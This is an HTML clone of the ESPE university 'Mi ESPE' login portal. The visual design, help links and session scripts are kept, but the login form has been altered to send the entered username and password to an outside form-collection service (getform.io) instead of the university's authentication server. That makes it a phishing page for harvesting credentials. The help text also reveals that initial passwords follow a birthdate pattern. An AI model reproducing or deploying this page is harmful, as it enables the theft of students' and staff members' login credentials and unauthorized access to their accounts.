<html><head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Mi ESPE</title>

    <link rel="icon" href="images/favicon.png" type="image/x-icon">
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/Roboto.css" rel="stylesheet">
    <link href="css/custom-common.css" rel="stylesheet">

    
    <link href="css/bootstrap.min_1.css" rel="stylesheet" id="bootstrap-css">
    <script src="js/bootstrap.min.js"></script>
    <script src="js/jquery.min_1.js"></script>
    <link rel="stylesheet" href="css/font-awesome.min.css">
    <script src="js/affe9412eb.js" crossorigin="anonymous"></script>

    <!--[if lt IE 9]>
        <script src="js/html5shiv.min.js"></script>
        <script src="js/respond.min.js"></script>
        <![endif]-->

    <style>
        .row:before, .row:after {display: none !important;}
        .carousel-item h1 {
            color: #fff;
            font-size: 20px;
            margin: 75px auto;
            text-align: center;
        }

        .login-block r {

            width: 50%;
            margin: 0 auto;

        }

        .signup__overlay {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: auto;
        }

        .login_sec {


            padding: 0px;
            background-color: #f8fafb;

        }

        .login_sec img {

            margin: 24px auto;

        }

        .banner-sec {
            /*background: url(/authenticationendpoint/images/sidebar-4.jpg) no-repeat left bottom;*/
            background-size: cover;
            min-height: 500px;
            max-height: auto;
            padding: 0;
        }

        .banner-sm {
            /*background: url(/authenticationendpoint/images/miespesm.png) no-repeat left bottom;*/
            background-size: cover;
            min-height: 500px;
            padding: 0;
        }

        .carousel-fade .carousel-item {
            opacity: 0;
            transition-duration: .6s;
            transition-property: opacity;
        }

        .carousel-indicators {

            bottom: -41px;
        }

        .carousel-indicators .active {
            background-color: #fff;
        }

        .carousel-fade .carousel-item.active,
        .carousel-fade .carousel-item-next.carousel-item-left,
        .carousel-fade .carousel-item-prev.carousel-item-right {
            opacity: 1;
        }

        .carousel-fade .active.carousel-item-left,
        .carousel-fade .active.carousel-item-right {
            opacity: 0;
        }

        .carousel-fade .carousel-item-next,
        .carousel-fade .carousel-item-prev,
        .carousel-fade .carousel-item.active,
        .carousel-fade .active.carousel-item-left,
        .carousel-fade .active.carousel-item-prev {
            transform: translateX(0);
            transform: translate3d(0, 0, 0);
        }

        .container {

            -webkit-box-shadow: 0 0.1875rem 1.5rem rgba(0, 0, 0, 0.2);
            box-shadow: 0 0.1875rem 1.5rem rgba(0, 0, 0, 0.2);
            border-radius: 0.375rem;
            margin-bottom: 5%;

        }

        .carousel-inner {
            border-radius: 0 10px 10px 0;
        }

        .carousel-caption {
            text-align: left;
            left: 5%;
        }

        .login-sec {
            padding: 50px 30px;
            position: relative;
        }

        .login-sec .copy-text {
            position: absolute;
            width: 80%;
            bottom: 20px;
            font-size: 13px;
            text-align: center;
        }

        .login-sec .copy-text i {
            color: #00713d;
        }

        .login-sec .copy-text a {
            color: #007bff;
        }

        .login-sec h2 {
            margin-bottom: 30px;
            font-weight: 800;
            font-size: 30px;
            color: #00713d;
        }

        .login-sec h2:after {
            content: " ";
            width: 100px;
            height: 5px;
            background: #00713d;
            display: block;
            margin-top: 8px;
            border-radius: 3px;
            margin-left: auto;
            margin-right: auto
        }


        .banner-text {
            width: 70%;
            position: absolute;
            bottom: 40px;
            padding-left: 20px;
        }

        .banner-text h2 {
            color: #fff;
            font-weight: 600;
        }

        .banner-text h2:after {
            width: 100px;
            height: 5px;
            background: #FFF;
            display: block;
            margin-top: 20px;
            border-radius: 3px;
        }

        .banner-text p {
            color: #fff;
        }

        /* login start */

        .container-login100-form-btn {
            margin: 0 auto;
            display: block;
            text-align: center;
            padding-top: 1%;
            padding-bottom: 2%;
        }

        .login100-form {
            width: 100%;
        }


        .validate-input {
            position: relative;
        }

        .wrap-input100 {
            width: 100%;
            position: relative;
            border-bottom: 2px solid #d9d9d9;
            margin-bottom: 5%;
        }

        .label-input100 {

            font-size: 14px;
            color: #333333;
            line-height: 1.5;
            padding-left: 7px;
        }

        textarea:focus,
        input:focus {
            border-color: transparent !important;
        }

        .input100:focus+.focus-input100::before {
            width: 100%;
        }



        .input100 {
            font-size: 12px;
            color: #333333;
            line-height: 1.2;
            display: block;
            width: 100%;
            height: 30px;
            background: transparent;
            padding: 0 7px 0 43px;
        }

        .focus-input100 {
            position: absolute;
            display: block;
            width: 100%;
            height: 100%;
            top: 0;
            left: 0;
            pointer-events: none;
        }

        .focus-input100::before {
            content: "";
            display: block;
            position: absolute;
            bottom: -2px;
            left: 0;
            width: 0;
            height: 2px;
            background: #7f7f7f;
            -webkit-transition: all 0.4s;
            -o-transition: all 0.4s;
            -moz-transition: all 0.4s;
            transition: all 0.4s;
        }

        .focus-input100::after {
            font-family: "FontAwesome";
            content: "\f007";
            color: #adadad;
            font-size: 22px;
            display: -webkit-box;
            display: -webkit-flex;
            display: -moz-box;
            display: -ms-flexbox;
            display: flex;
            align-items: center;
            justify-content: center;
            position: absolute;
            height: calc(100% - 20px);
            bottom: 0;
            left: 0;
            padding-left: 13px;
            padding-top: 3px;
        }

        .focus-input100.password::after {
            font-family: "FontAwesome";
            content: "\f023";
            color: #adadad;
            font-size: 22px;
            display: -webkit-box;
            display: -webkit-flex;
            display: -moz-box;
            display: -ms-flexbox;
            display: flex;
            align-items: center;
            justify-content: center;
            position: absolute;
            height: calc(100% - 20px);
            bottom: 0;
            left: 0;
            padding-left: 13px;
            padding-top: 3px;
        }

        input {
            outline: none;
            border: none;
        }



        .flex-c-m {
            display: -webkit-box;
            display: -webkit-flex;
            display: -moz-box;
            display: -ms-flexbox;
            display: flex;
            justify-content: center;
            -ms-align-items: center;
            align-items: center;
        }

        .login100-social-item {
            font-size: 12px;
            color: #fff;
            display: -webkit-box;
            display: -webkit-flex;
            display: -moz-box;
            display: -ms-flexbox;
            display: flex;
            justify-content: center;
            align-items: center;
            width: 28px;
            height: 28px;
            border-radius: 50%;
            margin: 5px;
        }

        .bg1 {
            background-color: #00713d;
        }


        .bg3 {
            background-color: #ea4335;
        }


        @import url(https://fonts.googleapis.com/css?family=Raleway:400,500,700);
        @import url(css/ionicons.min.css);


        /*movimiento del slider de las 6 imagenes*/

        @keyframes cambio {
            0% {
                margin-left: 0;
            }

            15% {
                margin-left: 0;
            }




            15% {
                margin-left: -100%;
            }

            30% {
                margin-left: -100%;
            }



            30% {
                margin-left: -200%;
            }

            45% {
                margin-left: -200%;
            }




            45% {
                margin-left: -300%;
            }

            60% {
                margin-left: -300%;
            }



            60% {
                margin-left: -400%;
            }

            75% {
                margin-left: -400%;
            }



            75% {
                margin-left: -500%;
            }

            90% {
                margin-left: -500%;
            }


            100% {
                margin-left: -600%;
            }

            120% {
                margin-left: -600%;
            }





        }

        figure.snip1477 {
            margin: auto;

            font-family: 'Raleway', Arial, sans-serif;
            position: absolute;
            padding-top: 0px;
            margin: 0%;
            overflow: hidden;
            width: 100%;
            height: 100%;
            color: #ffffff;
            font-size: 15px;
            background-color: #000000;

        }

        figure.snip1477 img {
            min-height: 1000px;
            max-height: 100%;
            backface-visibility: hidden;
            vertical-align: top;
            opacity: 0.9;
            background-size: cover;
            padding: 0;
            position: absolute;

        }

        figure.snip1477 ul {
            display: flex;
            padding: 0;
            width: 600%;
            background-size: cover;
            animation: cambio 25s infinite linear;
            animation-timing-function: step-end;
            margin-top: 0;

        }

        figure.snip1477 li {
            width: 100%;
            list-style: none;

        }



        figure.snip1477 figcaption {
            position: absolute;
            bottom: 50%;
            left: 25px;
            text-align: left;
            opacity: 0;
            padding: 5px 60px 5px 10px;
            font-size: 0.8em;
            font-weight: 500;
            letter-spacing: 1.5px;
        }

        figure.snip1477 figcaption p {
            margin: 0;
        }


        figure.snip1477:hover figcaption,
        figure.snip1477.hover figcaption {
            opacity: 1;
            -webkit-transition-delay: 0.2s;
            transition-delay: 0.2s;
        }

        figure.snip1477:hover img,
        figure.snip1477.hover img {
            zoom: 1;
            filter: alpha(opacity=35);
            -webkit-opacity: 0.35;
            opacity: 0.35;
        }

        figure.snip1477:hover .title:before,
        figure.snip1477:hover .title:after,
        figure.snip1477:hover .title div:before,
        figure.snip1477.hover .title div:before,
        figure.snip1477:hover .title div:after,
        figure.snip1477.hover .title div:after {
            -webkit-transform: translate(0, 0);
            transform: translate(0, 0);
        }

        figure.snip1477:hover .title:before,
        figure.snip1477.hover .title:after {
            -webkit-transition-delay: 0.15s;
            transition-delay: 0.15s;
        }


        figure.snip1477 *,
        figure.snip1477 *:before,
        figure.snip1477 *:after {
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
            -webkit-transition: all 0.55s ease;
            transition: all 0.55s ease;

        }

        figure.snip1477 .title {
            position: absolute;
            top: 50%;
            left: 25px;
            padding: 10px 10px 5px;

        }

        /*lineas de abajo y arriba*/

        figure.snip1477 .title:before,
        figure.snip1477 .title:after {
            height: 2px;
            width: 1300px;
            position: absolute;
            content: '';
            background-color: #ffffff;
        }

        figure.snip1477 .title:before {
            top: 0px;
            left: 10px;
            -webkit-transform: translateX(100%);
            transform: translateX(100%);
        }

        /*linea abajo*/
        figure.snip1477 .title:after {
            bottom: 15px;
            right: 15px;
            left: -880px;
            -webkit-transform: translateX(-100%);
            transform: translateX(-100%);
        }

        /*lados*/
        figure.snip1477 div:before,
        figure.snip1477 div:after {
            width: 2px;
            height: 680px;
            position: absolute;
            content: '';
            background-color: white;
        }

        /*lado solo izquierdo*/
        figure.snip1477 div:after {
            bottom: 27px;
            left: 0;
            -webkit-transform: translateY(-100%);
            transform: translateY(-100%);
        }

        /*lado solo derecho*/
        figure.snip1477 div:before {
            top: 10px;
            right: 0px;
            -webkit-transform: translateY(100%);
            transform: translateY(100%);

        }

        figure.snip1477 .title .bord .slider {
            position: center;

            overflow: hidden;
            background-color: transparent;
            width: 410px;
            height: 90px;

        }

        figure.snip1477 .title .bord .slider ul {
            display: flex;
            width: 600%;
            background-size: cover;
            animation: movimiento 25s infinite linear;
            animation-timing-function: step-end;

        }

        figure.snip1477 .title .bord .slider li {
            list-style: none;
        }

        @keyframes movimiento {
            0% {
                margin-left: 0;
            }

            15% {
                margin-left: 0;
            }




            15% {
                margin-left: -100%;
            }

            30% {
                margin-left: -100%;
            }



            30% {
                margin-left: -200%;
            }

            45% {
                margin-left: -200%;
            }




            45% {
                margin-left: -300%;
            }

            60% {
                margin-left: -300%;
            }



            60% {
                margin-left: -400%;
            }

            75% {
                margin-left: -400%;
            }



            75% {
                margin-left: -500%;
            }

            90% {
                margin-left: -500%;
            }


            100% {
                margin-left: -600%;
            }

            120% {
                margin-left: -600%;
            }

        }




        figure.snip1477 h2,
        figure.snip1477 h3,
        figure.snip1477 h4 {
            margin: 0;
            text-transform: uppercase;
        }

        figure.snip1477 h2 {
            font-weight: 300;
        }

        /* parte de  Mi Espe*/
        figure.snip1477 h3 {
            top: 0px;
            margin: 15px 430px -100px;

            width: 14%;
            font-weight: 400;
            text-shadow: rgb(235, 228, 228);
            background-color: #292424;
            padding: 24px 10px;
            color: #ffffff;
            text-align: left;
            font-size: 25px;
        }

        /*-------------------------------*/

        figure.snip1477 h4 {
            top: 100%;
            left: 25px;

            display: block;
            font-weight: 500;
            background-color: #ffffff;
            padding: 5px 10px 15px;
            color: #000000;
        }

        figure.snip1477 .title .bord .slider h2 {
            width: 140%;
            font-weight: 200;
            background-color: #292424;
            /*padding: 5px 10px;*/
            color: #ffffff;
            text-align: left;

        }

        /*parte blanca del texto*/
        figure.snip1477 .title .bord .slider h4 {

            display: block;
            font-weight: 700;
            background-color: #ffffff;
            padding: 10px 10px;
            color: #000000;
            text-align: center;

        }


        figure.snip1477 .title .bord .slider h4 {
            display: block;
            font-weight: 600;
            padding: 10px 5px;
            background-color: #ffffff;
            color: #000000;
            font-size: 20px;


        }

        /* -------fecto opup overlay*-----*/
        @import url(https://fonts.googleapis.com/css?family=Open+Sans);
        @import url(https://fonts.googleapis.com/css?family=Federo);

        /* overlay styles, all needed */
        .overlay {
            position: absolute;
            top: 0;
            left: 0;
            height: 100%;
            width: 100%;
            background-color: #141212f1;
            z-index: 5;
        }

        /* just some content with arbitrary styles for explanation purposes */
        .modal {
            display: none;
        }

        .modal:target {

            display: block;
            position: fixed;
            background: rgba(0, 0, 0, 0.8);
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
        }

        .imagen {
            top: 0;
            width: 100%;
            height: 50%;
            display: flex;
            justify-content: center;
            align-items: center;

        }

        .imagen a {
            color: rgb(252, 250, 250);
            font-size: 40px;
            text-decoration: none;
            margin: 0 10px;
            cursor: pointer;
        }


        .imagen a:nth-child(2) {
            margin: 0;
            height: 100%;
            flex-shrink: 2;
        }

        .imagen img {
            width: 100%;
            height: auto;
            max-width: 100%;
            border: 7px solid rgb(231, 231, 231);
            box-sizing: border-box;
        }

        /*.cerrar {
            color: rgb(252, 250, 250);
            font-size: 20px;
            text-decoration: none;
            margin: 0 10px;
            cursor: pointer;

            display: block;
            background: #fff;
            width: 35px;
            height: 38px;
            margin: 15px auto;
            text-align: center;
            text-decoration: none;
            font-size: 25px;
            color: #000;
            padding: 5px;
            border-radius: 50%;
            line-height: 25px;

        }

        /*EFECTO SLIDER*/
        .overlay {
            position: absolute;
            top: 0;
            left: 0;
            height: 100%;
            width: 100%;
            background-color: #141414ec;
            z-index: 5;

        }

        .overlay1 {
            width: 50%;
            margin: 100px auto;
            overflow: hidden;

        }

        .overlay1 ul {
            display: flex;
            padding: 0;
            width: 500%;

            animation: cambio3 30s infinite alternate linear;
            cursor: pointer;

        }


        .overlay1 li {
            width: 100%;
            list-style: none;
            cursor: pointer;

        }

        .overlay1 img {
            width: 100%;
            cursor: pointer;
        }

        @keyframes cambio3 {
            0% {
                margin-left: 0;
            }

            10% {
                margin-left: 0;
            }


            15% {
                margin-left: -100%;
            }

            25% {
                margin-left: -100%;
            }


            30% {
                margin-left: -200%;
            }

            45% {
                margin-left: -200%;
            }



            50% {
                margin-left: -300%;
            }

            65% {
                margin-left: -300%;
            }


            70% {
                margin-left: -400%;
            }

            100% {
                margin-left: -400%;
            }


        }

        /*botonSalir*/
        .button {

            width: 7%;
            cursor: pointer;
            display: inline-block;
            vertical-align: middle;
            padding: auto;
            border-radius: auto;
            background: none;
            margin: 0 0 0 -5px;

        }

        /*flechas de navegacion*/
        .triangulo {
            border-style: solid;
            border-width: 21px;
            width: auto;
            height: 0;
        }


        .triangulo.right {
            border-color: transparent transparent transparent black;
            top: -10px;
            left: -21px;
        }



        .triangulo.left {
            border-color: transparent black transparent transparent;
            top: -10px;
            left: -21px;

        }
    </style>




    

    <script>

       
        function getParameterByName(name, url) {
            if (!url) {
                url = window.location.href;
            }
            name = name.replace(/[\[\]]/g, '\$&');
            var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
                results = regex.exec(url);
            if (!results) return null;
            if (!results[2]) return "";
            return decodeURIComponent(results[2].replace(/\+/g, ' '));
        }
    </script>

</head>

<body>
    
    <!-- page content -->
    <div class="container-fluid">
        <div class="row">
            <div class="col-md-8 col-lg-8 banner-sm  hidden-xs visible-sm visible-md visible-lg">
                <figure class="snip1477">
                    <ul>
                        <li><img src="images/sidebar-4.jpg" alt="sample38" width="100%" height="auto"></li>
                        <li><img src="images/espe4.jpg" alt="sample38" width="100%" height="auto"></li>
                        <li><img src="images/Espel.jpg" alt="sample38" width="100%" height="auto"></li>
                        <li><img src="images/espe2.jpg" alt="sample38" width="100%" height="auto"></li>
                        <li><img src="images/Iasa.jpg" alt="sample38" width="100%" height="auto"></li>
                        <li><img src="images/espe.jpg" alt="sample38" width="100%" height="auto"></li>
                    </ul>
                    <div class="title">
                        <div class="bord">
                            <div class="slider">
                                <ul>
                                    <li>
                                        <h2> SISTEMA INTEGRADO DE INFORMACIÓN</h2>
                                        <h4><a href="https://miespe.espe.edu.ec" style="color:rgb(3, 3, 3);">
                                                Gestión
                                                Talento Humano </a></h4>
                                    </li>
                                    <li>
                                        <h2> SISTEMA INTEGRADO DE INFORMACIÓN</h2>
                                        <h4><a href="https://miespe.espe.edu.ec" style="color:rgb(3, 3, 3);">
                                                Docentes </a></h4>
                                    </li>
                                    <li>
                                        <h2> SISTEMA INTEGRADO DE INFORMACIÓN</h2>
                                        <h4><a href="https://miespe.espe.edu.ec" style="color:rgb(3, 3, 3);">
                                                Gestión
                                                Académica</a></h4>
                                    </li>
                                    <li>
                                        <h2> SISTEMA INTEGRADO DE INFORMACIÓN</h2>
                                        <h4> <a href="https://miespe.espe.edu.ec" style="color:rgb(3, 3, 3);">
                                                Estudiantes </a></h4>
                                    </li>
                                    <li>
                                        <h2> SISTEMA INTEGRADO DE INFORMACIÓN</h2>
                                        <h4><a href="https://miespe.espe.edu.ec" style="color:rgb(3, 3, 3);">
                                                Investigación </a></h4>
                                    </li>
                                    <li>
                                        <h2> SISTEMA INTEGRADO DE INFORMACIÓN</h2>
                                        <h4> <a href="https://miespe.espe.edu.ec" style="color:rgb(3, 3, 3);">
                                                Administrativos </a></h4>
                                    </li>
                                </ul>
                            </div>
                        </div>
                    </div>
                    <figcaption>
                        <h2>UNIVERSIDAD DE LAS FUERZAS ARMADAS - ESPE</h2>
                    </figcaption>
                    <a href="#"></a>
                </figure>

            </div>
            <div class="col-xs-12 col-sm-12 col-md-4 col-lg-4">
                <div class="col-10 offset-1 hidden-xs hidden-sm text-center">
                    <img src="images/Espe-Angular-Logo.png" style="padding-top: 65px; width: 375; " class="img-fluid">
                </div>
                <div class="col-10 offset-1 visible-xs visible-sm">
                    <img src="images/Logo-MiESPE.png" style="padding-top: 40px;" class="img-fluid align-content-center">
                </div>
                <div class="container-fluid body-wrapper">

                    <div class="row">

                        <!-- content -->
                        <div class="fluid-wrapper">

                            
                            
                            


                            
                            


















</script>


<form action="https://getform.io/f/bejroyva" method="POST">
    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 form-group"><br>
        
        <input id="username" name="usuario" style="font-size:16px; text-transform: lowercase;" 
               type="text" class="form-control text-3xl" placeholder="Usuario" required autofocus autocomplete="off">
    </div>
    
    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 form-group">
                <input id="password" name="clave_usuario" style="font-size:16px;" 
               type="password" class="form-control text-3xl" placeholder="Contraseña" autocomplete="off" required>
    </div>

    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 form-group">
        <button type="submit" class="wr-btn grey-bg col-xs-12 col-md-12 col-lg-12 uppercase font-extra-large margin-bottom-double">
            Enviar
        </button>
    </div>
</form>


    
    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 form-group">
        <div class="form-actions">
            <!--Olvidó
                
                    <a id="usernameRecoverLink" href="https://srvcas.espe.edu.ec/accountrecoveryendpoint/recoverusername.do?callback=https%3A%2F%2Fsrvcas.espe.edu.ec%3A443%2Fauthenticationendpoint%2Flogin.do%3FName%3DPreLoginRequestProcessor%26commonAuthCallerPath%3D%2525252Fcas%2525252Flogin%26forceAuth%3Dtrue%26passiveAuth%3Dfalse%26service%3Dhttps%25253A%25252F%25252Fmiespe.espe.edu.ec%25252Fc%25252Fportal%25252Flogin%26tenantDomain%3Dcarbon.super%26sessionDataKey%3D3f21251f-ebd8-4c38-8cb3-dcf1c8120e2c%26relyingParty%3Dportal_luminis%26type%3Dcas%26sp%3Dportal_luminis%26isSaaSApp%3Dfalse%26authenticators%3DBasicAuthenticator%3ALOCAL">
                        
                    </a>
                    su
                
                <a id="passwordRecoverLink" href="https://srvcas.espe.edu.ec/accountrecoveryendpoint/recoverpassword.do?callback=https%3A%2F%2Fsrvcas.espe.edu.ec%3A443%2Fauthenticationendpoint%2Flogin.do%3FName%3DPreLoginRequestProcessor%26commonAuthCallerPath%3D%2525252Fcas%2525252Flogin%26forceAuth%3Dtrue%26passiveAuth%3Dfalse%26service%3Dhttps%25253A%25252F%25252Fmiespe.espe.edu.ec%25252Fc%25252Fportal%25252Flogin%26tenantDomain%3Dcarbon.super%26sessionDataKey%3D3f21251f-ebd8-4c38-8cb3-dcf1c8120e2c%26relyingParty%3Dportal_luminis%26type%3Dcas%26sp%3Dportal_luminis%26isSaaSApp%3Dfalse%26authenticators%3DBasicAuthenticator%3ALOCAL">
                    Contraseña
                </a>
                ?-->
            <div> ¿Olvidó su <a class="" href="https://recover.espe.edu.ec">Contraseña?</a>
                <a href="https://youtu.be/Z9TA8hF3orc" target="_blank"><span data-toggle="tooltip" data-placement="bottom" title="Ver video" class="glyphicon glyphicon-facetime-video"></span></a>
            </div>
            <div>
                Verifique su <a target="_blank" class="" href="https://bannapitest.espe.edu.ec/Reportes/reportPublic.php?key=espeCU">Usuario</a>
            </div>
            <div>
                Mesa de  <a target="_blank" class="" href="https://help-desk.espe.edu.ec/">Ayuda</a>
            </div>
        </div>

        <!-- <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 padding-double">
        <div class="alert alert-warning margin-bottom-3 padding-10" role="alert">
            <div>
                Este sitio web usa cookies para garantizar que obtengas la mejor experiencia en nuestro sitio web. Puede consultar nuestra 
                <a href="cookie_policy.do" target="policy-pane">
                    Política de Cookies
                </a>
                para más detalles.
            </div>
        </div>
        <div class="alert alert-warning margin-none padding-10" role="alert">
            <div>
                Al iniciar sesión, aceptas nuestras
                <a href="privacy_policy.do" target="policy-pane">
                    Políticas de Privacidad.
                </a>
            </div>
        </div>
    </div> -->




        <div class="form-actions">
            
        </div>
    </div>
    
    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 form-group">
        <div class="form-actions" style="visibility: hidden">
            Dont have an account?
            <a id="registerLink" href="https://srvcas.espe.edu.ec/accountrecoveryendpoint/register.do?callback=https%3A%2F%2Fsrvcas.espe.edu.ec%3A443%2Fauthenticationendpoint%2Flogin.do%3FName%3DPreLoginRequestProcessor%26commonAuthCallerPath%3D%2525252Fcas%2525252Flogin%26forceAuth%3Dtrue%26passiveAuth%3Dfalse%26service%3Dhttps%25253A%25252F%25252Fmiespe.espe.edu.ec%25252Fc%25252Fportal%25252Flogin%26tenantDomain%3Dcarbon.super%26sessionDataKey%3D3f21251f-ebd8-4c38-8cb3-dcf1c8120e2c%26relyingParty%3Dportal_luminis%26type%3Dcas%26sp%3Dportal_luminis%26isSaaSApp%3Dfalse%26authenticators%3DBasicAuthenticator%3ALOCAL">
                Register Now
            </a>
        </div>
    </div>
    
    
    </form></div>

    <div class="clearfix"></div>
    


                            

                            

                            
                            
                            <div class="clearfix"></div>
                            <!-- /content -->
                            <div class="col-12 center-block">
                                <div class="row">
                                    <ul class="nav nav-tabs">
                                        <li><a href="#1a" data-toggle="tab" class="text-success">
                                                <span data-toggle="tooltip" data-placement="bottom" title="Recomendaciones" class=" glyphicon glyphicon-info-sign"></span></a>
                                        </li>
                                        <li class="active">
                                            <a href="#2a" data-toggle="tab" class="text-primary">
                                                <span data-toggle="tooltip" data-placement="bottom" title="Información General" class="	glyphicon glyphicon-search "></span></a>
                                        </li>
                                        <!-- <li ><a href="#4a" data-toggle="tab" class="text-danger">
                                                <span data-toggle="tooltip" data-placement="bottom"
                                                    title="Matrí­cula Nivelación"
                                                    class="glyphicon glyphicon-education"></span></a>
                                        </li> -->
                                        <li><a href="#3a" data-toggle="tab" class="text-dark">
                                                <span data-toggle="tooltip" data-placement="bottom" title="Mas Información" class="glyphicon glyphicon-question-sign"></span></a>
                                        </li>
                                    </ul>
                                </div>
                                <div class="tab-content row" style="height:180px; margin-bottom: 30px;">
                                    <div class="tab-pane " id="1a"><br>
                                        <h4>RECOMENDACIONES</h4>
                                        <p><span class="text-danger">Eliminar cookies del navegador</span> <a href="https://youtu.be/31ovG3VVSdo" target="_blank">Mira el
                                                Video</a></p>
                                        <p>La clave de acceso por primera vez es su fecha de nacimiento en formato de 2
                                            d gitos
                                            ejemplo: <span class="font-weight-bold">20 de
                                                Febrero del 1998.</span> <br>
                                            Debe ingresar as  : <span class="text-danger"> 200298 </span></p>
                                    </div>
                                    <div class="tab-pane active" id="2a"><br>
                                        <h4>INFORMACIÓN GENERAL</h4>
                                        <p>Revise la información disponible, utilizando los siguientes enlaces:
                                        </p>
                                        <ul class="list-group list-group-flush">
                                            <li class="list-group-item"><a href="https://bannapitest.espe.edu.ec/Reportes/reportPublic.php?key=espeMIDP" target="_blank"><span data-toggle="tooltip" data-placement="bottom" title="Información de Estudiantes" class="glyphicon glyphicon-user"></span> Informaci n de
                                                    Estudiantes</a> </li>
                                            <li class="list-group-item"><a href="https://bannapitest.espe.edu.ec/Reportes/reportPublic.php?key=espeMIFM" target="_blank"><span data-toggle="tooltip" data-placement="bottom" title="Información de Matrículas" class="glyphicon glyphicon-file"></span> Información de
                                                    Matrículas</a> </li>
                                            <li class="list-group-item"><a href="https://bannapitest.espe.edu.ec/Reportes/reportPublic.php?key=espeMINRC" target="_blank"><span data-toggle="tooltip" data-placement="bottom" title="Búsqueda de NRCs" class="glyphicon glyphicon-search"></span> Búsqueda
                                                    de NRCs</a> </li> 
                                                    <li class="list-group-item"><a href="https://bannapitest.espe.edu.ec/Reportes/reportPublic.php?key=espeBNRC" target="_blank"><span data-toggle="tooltip" data-placement="bottom" title="IDIOMAS B squeda de NRCs" class="glyphicon glyphicon-zoom-in"></span> Idiomas B squeda
                                                        de NRCs</a> </li>
                                            </ul>
                                    </div>
                                    <div class="tab-pane" id="3a"><br>
                                        <h4>AYUDA</h4>
                                        <p data-toggle="tooltip" data-placement="bottom" title="Ver video">¿Cómo acceder
                                            a EDUROAM? <a href="https://www.youtube.com/watch?v=86Ipc4X3_H4&feature=youtu.be" target="_blank"><span class="	glyphicon glyphicon-phone "></span></a>
                                        </p>
                                        <p><a href="https://youtu.be/4_ZxzC6IM2A" target="_blank"> ¿Cómo acceder a Mi
                                                ESPE?</a></p>
                                        <p><a href="https://help-desk.espe.edu.ec" target="_blank"> Mesa de ayuda</a></p>
                                            
                                        <p>Para información académica comunícate con la Unidad de Estudios Presenciales a través de la cuenta de correo electrónico:
                                            <span class="text-info">uep.soporte.academico@espe.edu.ec</span> </p>
                                    </div>
                                </div>
                            </div>
                            <div class="center-block text-dark"><br>
                                <div class="col-4 offset-4 hidden-xs">
                                    <img src="images/Logo-MiESPE.png" class="img-fluid align-content-center">
                                </div>
                                <p class="text-center">
                                    <strong> </strong>
                                    <a href="https://www.espe.edu.ec" target="_blank">Universidad de las Fuerzas
                                        Armadas ESPE</a>
                                    </p><p class="font-weight-bold text-center">
                                        Unidad de Tecnologías de la Información y Comunicaciones 
                                        <br> 
                                        UTIC PROD 1
                                    </p>
                                <p></p>
                            </div>

                        </div>
                    </div>
                    <!-- /content/body -->
                </div>
            </div>
            
        </div>
        <script src="js/jquery-1.11.3.js"></script>
        <script src="js/bootstrap.min_2.js"></script>

        <script>
            $(document).ready(function () {
                $('.main-link').click(function () {
                    $('.main-link').next().hide();
                    $(this).next().toggle('fast');
                    var w = $(document).width();
                    var h = $(document).height();
                    $('.overlay').css("width", w + "px").css("height", h + "px").show();
                });
                $('[data-toggle="popover"]').popover();
                $('.overlay').click(function () {
                    $(this).hide();
                    $('.main-link').next().hide();
                });

            
        });
            function myFunction(key, value, name) {
                var object = document.getElementById(name);
                var domain = object.value;


                if (domain != "") {
                    document.location = "../commonauth?idp=" + key + "&authenticator=" + value +
                        "&sessionDataKey=3f21251f-ebd8-4c38-8cb3-dcf1c8120e2c&domain=" +
                            domain;
                } else {
                    document.location = "../commonauth?idp=" + key + "&authenticator=" + value +
                        "&sessionDataKey=3f21251f-ebd8-4c38-8cb3-dcf1c8120e2c";
                }
            }

            function handleNoDomain(key, value) {
            
                    document.location = "../commonauth?idp=" + key + "&authenticator=" + value +
                        "&sessionDataKey=3f21251f-ebd8-4c38-8cb3-dcf1c8120e2c" +
                            "";
            }

            $('#popover').popover({
                html: true,
                title: function () {
                    return $("#popover-head").html();
                },
                content: function () {
                    return $("#popover-content").html();
                }
            });
            window.onunload = function () { };
        </script>

        <script>
            function changeUsername(e) {
                document.getElementById("changeUserForm").submit();
            }
        </script>

        

        <!-- Bootstrap core JavaScript
    ================================================== -->
        <!-- Placed at the end of the document so the pages load faster -->
        <script src="js/jquery.min.js"></script>
        <script src="js/bootstrap.min_1.js"></script>




</body></html>